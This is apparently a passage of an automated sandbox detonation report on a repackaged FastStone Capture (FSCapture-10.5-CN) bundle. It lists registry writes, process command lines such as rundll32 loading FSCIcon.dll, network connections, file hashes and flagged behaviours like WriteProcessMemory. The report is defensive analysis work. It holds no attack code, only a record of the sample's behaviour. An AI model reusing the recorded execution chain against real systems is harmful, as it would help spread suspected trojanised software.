Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\International\CpMRU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a7e3310a2b0e6e498bd88e48ec67abf6000000000200000000001066000000010000200000005c202287b9914e209c9cdaaaabe1c7fbca921f25b8d9cbe3de566705a5205d60000000000e800000000200002000000023f7fd7f5789f7730304c8ca99cc85f6c093dff46510585aa518e579ad5ad68520000000bfd1d8aadbd7e05e29afc60d95a37caf35dc78f3cb48c266295896a154272336400000001bd9186227e2912ca1258333e7666062de415b225aca48ce6bc968107b8d9ae41b11231008ce37365cfe9ebda878d0b359b388dfaa22fdea9dae9517649312d1 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C454E631-9A67-11EF-BDBD-E62D5E492327} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "436857461" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 107cc3da742edb01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\423Down.url:favicon C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Windows\System32\rundll32.exe

"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\423Down.url

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1920 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.423down.com udp
US 45.151.132.50:443 www.423down.com tcp
US 45.151.132.50:443 www.423down.com tcp
US 8.8.8.8:53 repository.certum.pl udp
GB 2.18.63.4:80 repository.certum.pl tcp
GB 2.18.63.4:80 repository.certum.pl tcp
US 8.8.8.8:53 dvcasha2.ocsp-certum.com udp
GB 2.18.63.5:80 dvcasha2.ocsp-certum.com tcp
US 45.151.132.50:443 www.423down.com tcp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 45.151.132.50:443 www.423down.com tcp
US 45.151.132.50:443 www.423down.com tcp
US 45.151.132.50:443 www.423down.com tcp
GB 142.250.178.14:443 fundingchoicesmessages.google.com tcp
GB 142.250.178.14:443 fundingchoicesmessages.google.com tcp
US 8.8.8.8:53 hm.baidu.com udp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
GB 142.250.187.227:80 c.pki.goog tcp
GB 142.250.187.227:80 c.pki.goog tcp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
US 8.8.8.8:53 o.pki.goog udp
US 8.8.8.8:53 o.pki.goog udp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 2.18.63.21:80 dvcasha2.ocsp-certum.com tcp
GB 142.250.187.227:80 o.pki.goog tcp
GB 142.250.187.227:80 o.pki.goog tcp
GB 142.250.187.227:80 o.pki.goog tcp
CN 183.240.98.228:443 hm.baidu.com tcp
CN 183.240.98.228:443 hm.baidu.com tcp
US 8.8.8.8:53 lh3.googleusercontent.com udp
GB 216.58.204.65:443 lh3.googleusercontent.com tcp
GB 216.58.204.65:443 lh3.googleusercontent.com tcp
GB 142.250.187.227:80 o.pki.goog tcp
GB 142.250.187.227:80 o.pki.goog tcp
CN 111.45.3.198:443 hm.baidu.com tcp
CN 111.45.3.198:443 hm.baidu.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.252.143:80 crl.microsoft.com tcp
CN 111.45.11.83:443 hm.baidu.com tcp
CN 111.45.11.83:443 hm.baidu.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
CN 14.215.183.79:443 hm.baidu.com tcp
CN 14.215.183.79:443 hm.baidu.com tcp
CN 14.215.182.140:443 hm.baidu.com tcp
CN 14.215.182.140:443 hm.baidu.com tcp
US 45.151.132.50:443 www.423down.com tcp
US 45.151.132.50:443 www.423down.com tcp

Files

memory/2332-0-0x00000000001D0000-0x00000000001E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabB03E.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarB0BE.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

MD5 6b102a4036d4963bf92ae86c9ca48084
SHA1 eabd41a74b15dd399535bec1c4b5a731db5b8b06
SHA256 33b606ab6fd50b13b92e85fc2de07ed91b5c0506441e4cd6413535c5273e9eb4
SHA512 72f77ccc99c82e5151aec5287e4e3247c5f0c2db4478d39be9dc7f7ea2fd73b598cf3a6de9f3b02a87cf64e6e5bdfc67d4393d09219d89818bf5d3228b1d3dce

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8d55baa9a2bce26ceaf1d480c77eeed9
SHA1 7a4ee0923ccec23f52cfea3a3182c30db54e272b
SHA256 496f03cbe2e88bb9a46d86f4475ee365161ac3cfd558cb93642323cc42c7ae6b
SHA512 46b80b9822e9b9f05d811a5e48f2f43d353cf40336ce5dd798722b55786f82e045e131a02dbc55de9eb3658829610173c7fbc41d2f2b850ed70113a466c07a37

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 6ff5143d371bd0529aaae3762528463a
SHA1 aa3b4d5d6482da2bd63dc0a60545cb85b334f96a
SHA256 546516c76c5bc9088065dcea28775e5c2f5f826d9cca0d15fe37d35f375fb84d
SHA512 2569da088e2936bab1e429d5f4b242eb9a8c555f2f55c818cdd7291a20d1ce0d77949eac9fd88ece8b8be455c59b6af8ad13f9a8d323d75ec8ed09c7c50ff1e4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 77353b3193ee6346eb7d1eb7380ed918
SHA1 32ff5fb15f3f8b7b8fe679252e2c571bf74c9077
SHA256 0c7cbf667fb5131af0e06577508c1164f18af3b6b88ebff2256d0a52c098d61d
SHA512 420a78968fb20bdf24d9d422e29be062b36eab18ca34b983f063503884c2e1f6a79635f2945223aa9661bd3f14707f4c1920492bbb77dc46afb95af429e4170f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 59b5fe484a27b67a6e7e7315984fe852
SHA1 c2af2b7cb41c7991f6db6bb9603aa9e9ef2a9b18
SHA256 5ddacdb39b5d09bb7e6f70c157c30ea361a07bf86ddd8b5818a3d2804fe3575f
SHA512 a415c6cfb8042f65a9824264cbd8b72f182fb5b80c8903c564c73747a6ee6142998a2cfe478df5ea3bfa494ffffd3430839216a544bd15af33b26fcb01f9a552

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 307b04bf7fe3445dd8987917c93f85f3
SHA1 0d3491567c107a26001ce0053b7bfd5167f1c115
SHA256 23972a8f1ae302b33d12d4a32793879e64cef5c4df93a2eb08fa5344956d2eb5
SHA512 2018de8a0f8e0801d5defb02cd4fdafe9115bc6f7371cca7f2dea4873b9b4eec77c6750d362280590d6e64dfa23fbf87cbef262bad7e94488c266a0ca948c3cd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ddcfc265dc02a700304747aa728adcb0
SHA1 3b4fb22bad6c1df4e6843564eec5268bccc1562c
SHA256 b21cb0fefa68b1facc1c14891832543894f11a6507f75d9c8e5c31715c7682a2
SHA512 4c6d8827d577e76707719f2fac8cb999e028b085cf3a6c15fcbaeb5750a389ccf9b74dce8ce8c432a340052f468ce9d3ca1614921e5ccfcea5abf924d0cf4fa2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 89023947167e2fa1f24c7602bce381b0
SHA1 16ca76ac9ef60e6a4c000cb0c674173f37d58356
SHA256 9f9ef432132d9fd9948568c57edea428ab0c9a4bf88b1915ccee897c911349b2
SHA512 b45597b48c6da43768c9c0e6cdbfa8e04b94eb006b24624ce2466eba30644314caed0538645f0945b671bfe1cd980054dffc0deb70f261753ecad8802e22b25c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 626ba64b900210c7ec6fe13fb20d150d
SHA1 6f5ba141a8892a48139a12fdb88ca732139a9d4b
SHA256 87ba0f32d54aba829e84cb3b8ace569f11ab4d813fddae6ddbf6069f78a14a44
SHA512 0f8d0d3ee70975d20d13459270d86cfab3eacf4a8829d04e391483b3cddc65f2880117b5ac837650cd23f5227581d397d6b5fdcb7a0849902f60b6b2f3632c96

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 1a7950c8a5548db8b9281cee55af5c72
SHA1 230505db2d44b7162b4e002faaca803f9e60a048
SHA256 d12dd8c19093d55960cf622fff2dbd1e62aceb3f19d05d533cade6f42f790e10
SHA512 89e01bfcb704eafd96381a20a420d5df6e04abca0ad299ddb042ebb90ece4618c5b2d99415ea1bbe42df46c1036f22f84fbbc84359309bd0f5b6f8ccdc6d2151

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3f3acf21bc37239a6baf8e1f754abc86
SHA1 5dd4e9e79e392f47c10777122fb0c5a74338f108
SHA256 05db5f14ecae92a4e23953b266abb49e6927e79af4f3b95e79b89155af3f04c9
SHA512 cdf215d7ec43899dacd0c54962bf52cf15b08d69da65683ec172e09c0cde7c922c958eaf6008fcf7a6de6f4680b57a7cde790608eaa6606749bb7161213102af

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 77607933fe7ddb8d04280b607b6f4f85
SHA1 8bd59c53273149ce10a57c4424071f9abe47d8ba
SHA256 4713d1f9c5ac6306d17bab3eef55bbcbd2d95bd7cd7d974e5b091bd955c66919
SHA512 d7daa70889518ef559518d6ae230b1a80fba2f6d325ef32817c4d47e52a0fceb4a7e144dd7948ade95a3ac2a61e59d1317079ee9eaf4678e4c096f8a5614628e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5bdfeeb2ff5843453e346d00f3fb4927
SHA1 b88e9714faae658e4d3672cdd9b3cf096d6a4f3c
SHA256 b37910e5f9241031800e5156710a9079ea0df57a5e3f620d628742093641786a
SHA512 36eb7d00ada7e71ba5da2ec1758249df8f4c2bc46b79e4dea4a6deeec1b5eef421fd13c1d739ce2d11d769e2ad336d07e2f13665caac86d46816a9925bf89ecd

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IAE3FJ0M\favicon[1].ico

MD5 013541699a919b36c708bd3d36e650ff
SHA1 44a9a999943f5662ffb347af8c93c5e854768ce4
SHA256 bf76e37a640a37d3bff989f6eb896e3b876eb30754ee44d11d1f64dca6b16abf
SHA512 5e0853c3eaec4f57e2954ba137f6ebf6c65b63eb9557ecbd3ffc70f8ca285c1f0eec4d383971474a7e149a4a0388ad20f24a47bfb0cba1e9fdaa474918167e8a

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\gsz3hkd\imagestore.dat

MD5 1afb0ebb0eabe78cf9d67504b8b64eae
SHA1 7f1d0dc0f01315838c187bbc965c41b4bb123314
SHA256 ef4772251b511348e152a57f04545105208ce59ab852a58e630a0015fa39e2b0
SHA512 e166a288f40c13f0f76a3a78921886596a9fd37de115c0409b14e0ed5d352961305161b41bff09bf1330027ceb26111bad0aa3525e64cf7e96642d81f8680685

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7ac31eb148212065b68705ce7db7c57d
SHA1 4ff4fa47c25e049759611d37aaafa51c67bdccc4
SHA256 5d38f9c1c2f6f8a48cab83f1fe4e4d076eda328c21536f9995e61b9fff8ab198
SHA512 fbe0dbb3f86184294a9417853333936e28d5296293b26f9830c7acefd2d3fb4769ee410ee2046f731aa30703c77a17fb0cc36e3c6e5f8c3fe207876861efdcf5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 547da402af5aef14e08c8d60be97546e
SHA1 58e9fec77417a62230a5d73d33cbc8750fb879a4
SHA256 f0b57a0f2c99742b272e5cce1597b30c029638c2832b52509a93c75a5edd2a7c
SHA512 a62d0639b23cfe5db117c7cd767ea60e4960c2866f76e4841c415c1391d18281d405bbf2057d61f6249e7c834366835e44d1176db27cca429f04bd1b71d8b686

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 94a8c95501af8760961530022103ba12
SHA1 1ee822265eb1163dc538831dd4be43dfa94e36ab
SHA256 e85504ed69b4918169868c7e1d520ab807dd661bde5e2c4f2fd14e79b6a9474e
SHA512 47eb0269a026c61da4bc9bd0303bafedd58c3b7b7a01d522780e5a585d569d51d9db7547309f6823faaed9d10d974721a0bb7f0f0940b979479ad3d2fd6f078b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a2b6e95159db351463759e2948927c2a
SHA1 724d442780ea0b28f67f64c4df185d309c59e864
SHA256 8f9b8b33a18bbcdf1bed04d24f0e9e10fd8a0f4b4f4817570da73a9a18092dd9
SHA512 4a59cff8f5ce15641a6e97f7fe3c5d3d2beeeb5b28c7928e2f516097e0e32cfb4d5cf528cc4237b05330249a758e8ba3749e0b1060fdc2ce9bb6ca17352752fc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 793cc8cda66331f4752d4dcc80d5b816
SHA1 ae44167cbe1a15ac088da4add7016c63bbb4ac9d
SHA256 570d63c4f3518c80ae700ea0de2fad8f3c773d8b48165e0d418b3dc99ac8a810
SHA512 12cbe1670a0aa7846d67e0d13319ea01c0b46b4950603071ef688ea215bae835891bd0f93e27b702992be14514c0b3a4255cff5690bceef4527e0b21afd6b018

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 52264938abfd1a6cd3299626dac4de30
SHA1 1448cbdc14cf475d817e7f9ee4ff29b73d7253f4
SHA256 d5e33e38b0f3b9a5ab21c21258dc11b9c1a2a500252184c3606d12bc06019d87
SHA512 5d988fd942cede8bd1214a252fafc0fda2378287017a0355950703bc18510a37594bc9361a69291223c7f83d72faac12a45e01739e632ec486ea3c3373360583

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0048de6dcb9211462fb4ed06d7e4449e
SHA1 0c78344a4f813fdeb6227bdc1b1743bd43191d6a
SHA256 a5a96a6c2d18b33500fa090e2375cdfeb386076643ecc5fbc4c4742894d7df17
SHA512 8d7060bd3a0494852688604650efc9776623c08a0d96df44a866aff529d7a923b666e2d3ead6dbd403a6627d480cb8ef1bb0ca578e408ecbf77c23d6887bd5e0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c5e285e00d7d926fdb5ed20023189fd2
SHA1 f2e6c9869a58b6ee67105198c35380cf446b23c0
SHA256 0a32959b062824853c33f54e8c142f4441eb38bae7ab448282ef09324336431e
SHA512 22c944c73f82d207a42f1e221a3d50009722402a97289cc457fb8a9e53734ddf8f49519e286a299a561cdaf0030ff999ea4d1d8cd28e1d47b0f5aaf3ec117f38

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f13da2b98df96335351e323d9fff0201
SHA1 a6f27ac0af4f6046a9be7886f2e42f7a7fe956d8
SHA256 acee4971aedb960ee67397d0892ed2701f13ccce75977c33b6a3f277a9e8af18
SHA512 956d89f7dc29828aaff03b44e287b6d1511820a5695a39e317ce8ee9a36fc92890eb997d589180f78f29b66e108f6298380ef4953eda7154b3511d7398fd4fd5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 adfa646ae2e678444f9af9639db61546
SHA1 2b7fe4f193b40e11501c7e0b73f20d6bbf9e1c53
SHA256 86d9aa191b052e224fa7527ffeefc9ac6cfd31ffdc80e386109564c8ec1bfb6f
SHA512 732fb6ee5623c543092f62236874ad23408822da6b9090641345be088f7de6345608c952e3dce2d7bab004289ee408318042641fa879eed91c02c61b1f438b58

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win7-20240708-en

Max time kernel

121s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCIcon.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCIcon.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCIcon.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

162s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
